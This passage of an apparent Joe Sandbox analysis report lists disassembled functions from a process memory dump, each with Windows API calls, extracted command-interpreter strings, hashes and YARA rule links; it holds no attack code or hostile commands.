                                                                                                                                                                                                                          • Opcode ID: e5c1461fba14532c764f83e6fd83e9766a294d6e24b59ee5f6149cb0dea645df
                                                                                                                                                                                                                          • Instruction ID: 5f77a4f88654c2b869624bbf7ebabff3fe9df3bf7e0a4600ce320f218fbf5468
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5c1461fba14532c764f83e6fd83e9766a294d6e24b59ee5f6149cb0dea645df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9412E312053069BDF286B58E85577A37A4EF62728F68042FE102965D0EFF6D485C752
                                                                                                                                                                                                                          Function 001A56C4 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 297COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A70,000000FF,00000000,?,00000001,?,?,?,001A5833,?, /D /c",?,?,?,00000000,?), ref: 001B1271
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: longjmp
                                                                                                                                                                                                                          • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                                                                          • API String ID: 1832741078-366822981
                                                                                                                                                                                                                          • Opcode ID: 9cbc02fa3c3093f63f94b12997c81297ab1f8da404f055e2cef55e1619885b6b
                                                                                                                                                                                                                          • Instruction ID: 7ddc6f85ae7fe6afddc880538f09da7e15fc4c9b2f3b19734b886d9120d54e7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cbc02fa3c3093f63f94b12997c81297ab1f8da404f055e2cef55e1619885b6b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BA11478704604FBCF28DF94C9A48EE7B63FB56394BA18116F406AB650CB70DE91DB81
                                                                                                                                                                                                                          Function 00197E93 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,001D0AF0,00002000,00000000,00000000,00000000,00000000), ref: 00197ED4
                                                                                                                                                                                                                            • Part of subcall function 0019A62F: wcschr.MSVCRT ref: 0019A635
                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,001D0AF0,00002000,?), ref: 00197F16
                                                                                                                                                                                                                          • _ultoa.MSVCRT ref: 001AAFC9
                                                                                                                                                                                                                          • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 001AAFDE
                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 001AAFF3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                                                                          • String ID: Application$System
                                                                                                                                                                                                                          • API String ID: 3538039442-3455788185
                                                                                                                                                                                                                          • Opcode ID: 7fe7075536b7e0f1f7c6481d7fc659769560d59d2312b5b067b02478c55c0284
                                                                                                                                                                                                                          • Instruction ID: 0df4276ca2f4ebed7d1f9327d7c3f9abde4ccf37874db7167405b3d29ef0ca20
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fe7075536b7e0f1f7c6481d7fc659769560d59d2312b5b067b02478c55c0284
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F141B371745315BBDB14DB649C89FAE7BA9EF49B41F60002AF506EB2C0D7709D40C761
                                                                                                                                                                                                                          Function 0019E950 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 276COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetwcschr$_wcsicmpiswspace
                                                                                                                                                                                                                          • String ID: :.\$=,;$=,;+/[] "
                                                                                                                                                                                                                          • API String ID: 1913572127-843887632
                                                                                                                                                                                                                          • Opcode ID: 314571e91970233c781fc53358d86f9d939f6c7ddc98f12cda5a324eb7c07a7f
                                                                                                                                                                                                                          • Instruction ID: 05933663a3bff7f8527622ab28ebe30b288430dec25f459ea0289cb0ce9a9171
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 314571e91970233c781fc53358d86f9d939f6c7ddc98f12cda5a324eb7c07a7f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9A1F334A05214DBDF28CBA8EC88BBA77F1BF45314F150199E80BA76E1D7709E85CB51
                                                                                                                                                                                                                          Function 001B53AA Relevance: 18.2, APIs: 12, Instructions: 169COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00199E8E: iswspace.MSVCRT ref: 00199E9E
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 001B5406
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 001B541C
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 001B544C
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 001B546B
                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B547B
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B5497
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001B549F
                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B54B3
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001B54D4
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 001B5501
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B5557
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001B5578
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4166807220-0
                                                                                                                                                                                                                          • Opcode ID: 53941e0059471335514268db7c29fc1fafbd930477c1ef716cc0c41024b60222
                                                                                                                                                                                                                          • Instruction ID: fb81e62d7355c13bebd57dd058465d35bf8571c4ecfb393e08917218ef736f57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53941e0059471335514268db7c29fc1fafbd930477c1ef716cc0c41024b60222
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1651A1716002189AEB34AB34DC09BE977EAFF00311F1485A9F486D61D0EF709E85CBA2
                                                                                                                                                                                                                          Function 00197610 Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00197669
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00197670
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00197686
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0019768D
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00197719
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019772B
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00197758
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001AAA79
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap_wcsicmp$AllocProcess
                                                                                                                                                                                                                          • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                          • API String ID: 435930816-3086019870
                                                                                                                                                                                                                          • Opcode ID: edbb82875f86d8d00938684cf263285c7119456ecab80220b01278f2a2b4d875
                                                                                                                                                                                                                          • Instruction ID: 67ce3dffaa3ca7d43289fc72ffe402117756fa5fd588069ef590c74a1f47ad8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edbb82875f86d8d00938684cf263285c7119456ecab80220b01278f2a2b4d875
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7251363521A3419FDB18DF78EC09A263BD5EF05314B68486EE442C76C1EB61D881CB66
                                                                                                                                                                                                                          Function 001BAEBD Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 266COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BAF04
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BAF2E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BAF58
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,0019250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 001BB08B
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 001BB095
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 001BB0AA
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 001BB1DA
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 001BB1F2
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 001BB20A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                          • String ID: %04X-%04X
                                                                                                                                                                                                                          • API String ID: 2748242238-1126166780
                                                                                                                                                                                                                          • Opcode ID: bf0aa9c1e2c6f86936d263262f02e10096d95c4351c7bf3bae42ce40fb88a005
                                                                                                                                                                                                                          • Instruction ID: 30334c8e332fcf90ed03e6a4991af27acd69a77fd1ea70f3bb3fc05d5ef7a788
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf0aa9c1e2c6f86936d263262f02e10096d95c4351c7bf3bae42ce40fb88a005
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24918EB1A052289BDF24DA28CC95AFAB7B9EF54304F4405E9F509D3140EBB49F848BA0
                                                                                                                                                                                                                          Function 0019BC30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                          • String ID: =,;
                                                                                                                                                                                                                          • API String ID: 3458554142-1539845467
                                                                                                                                                                                                                          • Opcode ID: a25f8affb98d8910c7c65dfbf531020726bae35b70c40595e88623b944c66b85
                                                                                                                                                                                                                          • Instruction ID: b02c081ff43c96d896b085d79ee2de7d7fb9dd070a24d103fe86ef9e381f6637
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a25f8affb98d8910c7c65dfbf531020726bae35b70c40595e88623b944c66b85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A981CF74904215CBDF349FA4EE857BA73F6AF10709F14446AE94AA7240EB748D84CB61
                                                                                                                                                                                                                          Function 001A23F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A2431
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A2452
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A247C
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,0019250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 001A2585
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001A25A3
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 001A25CA
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 001A25E3
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 001AF32B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$InformationVolume_wcsicmp
                                                                                                                                                                                                                          • String ID: FAT
                                                                                                                                                                                                                          • API String ID: 4247940253-238207945
                                                                                                                                                                                                                          • Opcode ID: d2677a0d468a4628d76a037129911a3a3dcf7f3fe04d66a4415801456cdc8d82
                                                                                                                                                                                                                          • Instruction ID: 716c48b90a061c922cc46ad9c5fb0c9f82f515815ada765fe736c4a9da5408ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2677a0d468a4628d76a037129911a3a3dcf7f3fe04d66a4415801456cdc8d82
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB516FB5D01218ABEF24CBA4DC99BEA77B8FB55305F1400A9E505E3181EB389F84CE25
                                                                                                                                                                                                                          Function 00197334 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00197381
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 001973D6
                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 001973F9
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000209,?,00000000,?), ref: 00197465
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 001AA8C6
                                                                                                                                                                                                                            • Part of subcall function 001A0060: wcschr.MSVCRT ref: 001A006C
                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 001AA87E
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 001AA89B
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001AA8DE
                                                                                                                                                                                                                            • Part of subcall function 001A589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?), ref: 001A58BB
                                                                                                                                                                                                                            • Part of subcall function 001A589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A58CD
                                                                                                                                                                                                                            • Part of subcall function 00198B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,001B99FD,00000000,?,00000000,001ACF94,00000000,?), ref: 00198B7B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                                                                          • String ID: \\.\
                                                                                                                                                                                                                          • API String ID: 799470305-2900601889
                                                                                                                                                                                                                          • Opcode ID: 791a2dddcc08293d151a34138410748ac6df60b2d0499c7678874ebab9f64f84
                                                                                                                                                                                                                          • Instruction ID: 0ccaaf15d36c2df22fc46ac389790e2092d9864b9dbc3c02d8ac470ff7c9e0b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 791a2dddcc08293d151a34138410748ac6df60b2d0499c7678874ebab9f64f84
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D5143756193019BDB30DB74988466BBBE8EF8A310F44082EF859C36C2EB34D845C7A3
                                                                                                                                                                                                                          Function 0019CB09 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$iswspace$_wcsicmp
                                                                                                                                                                                                                          • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                          • API String ID: 3089800946-2256444845
                                                                                                                                                                                                                          • Opcode ID: 7ad4a2cf9cdc7493142cd1b8517340ef360514e481d3e1d3829cf2f01159af81
                                                                                                                                                                                                                          • Instruction ID: b724d441555b1a94ec005a65112f1cd80835d8650903899d2339500829142c85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ad4a2cf9cdc7493142cd1b8517340ef360514e481d3e1d3829cf2f01159af81
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09312BB5A0272457CF208B69AC497AF77A5BF56305F140066EC0AD3212F7719D64CBE3
                                                                                                                                                                                                                          Function 001BBAF8 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 336COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001BC0F8: free.MSVCRT ref: 001BC116
                                                                                                                                                                                                                            • Part of subcall function 001BC0F8: free.MSVCRT ref: 001BC123
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001,00000000,?,00000000), ref: 001BBB97
                                                                                                                                                                                                                          • qsort.MSVCRT ref: 001BBC1A
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 001BBC6F
                                                                                                                                                                                                                          • calloc.MSVCRT ref: 001BBCB1
                                                                                                                                                                                                                          • calloc.MSVCRT ref: 001BBD82
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 001BBDCB
                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 001BBE1D
                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 001BBE3E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
